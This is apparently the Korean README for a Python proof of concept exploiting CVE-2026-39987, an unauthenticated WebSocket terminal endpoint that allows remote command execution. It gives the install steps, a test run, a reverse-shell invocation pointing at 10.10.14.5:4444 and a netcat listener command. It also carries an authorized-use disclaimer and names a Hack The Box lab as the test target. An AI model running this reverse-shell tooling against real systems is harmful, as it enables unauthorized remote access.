
CVE-2026-39987에 대한 Python 개념 증명으로, 인증되지 않은 WebSocket 터미널 엔드포인트를 악용하여 원격 명령 실행 및 리버스 셸 접근을 달성합니다.
CVE-2026-39987에 대한 Proof of Concept으로, 취약한 WebSocket 터미널 엔드포인트를 통한 원격 명령 실행을 시연합니다.
면책 조항: 이 PoC는 승인된 보안 테스트 및 교육 목적으로만 사용하도록 의도되었습니다. 소유하고 있거나 테스트에 대한 명시적 허가를 받은 시스템에만 사용하십시오.
이 취약점을 통해 인증되지 않은 사용자가 애플리케이션의 WebSocket 터미널 엔드포인트와 상호 작용하고 원격으로 명령을 실행할 수 있습니다.
PoC는 다음에 연결합니다:
wss://<target>/terminal/ws
그리고 WebSocket 연결을 통한 명령 실행을 시연합니다.
이 PoC를 개발/테스트하는 동안 사용된 대상은 승인된 Hack The Box 랩 환경이었습니다.
websocket-client필요한 라이브러리를 설치하십시오:
pip3 install websocket-client
python3 test.py <domain>
예시:
python3 test.py somesite.com
PoC는 WebSocket 연결을 설정하고 테스트 명령을 실행합니다.
PoC는 리버스 셸 옵션도 지원합니다:
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>
예시:
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444
PoC를 실행하기 전에 리스너를 시작하십시오:
nc -lvnp 4444
애플리케이션은 인증을 요구하지 않고 WebSocket 터미널 엔드포인트를 노출합니다.
PoC는:
초기 ws.recv()는 서버가 연결을 설정한 직후 셸 프롬프트를 전송하기 때문에 중요합니다.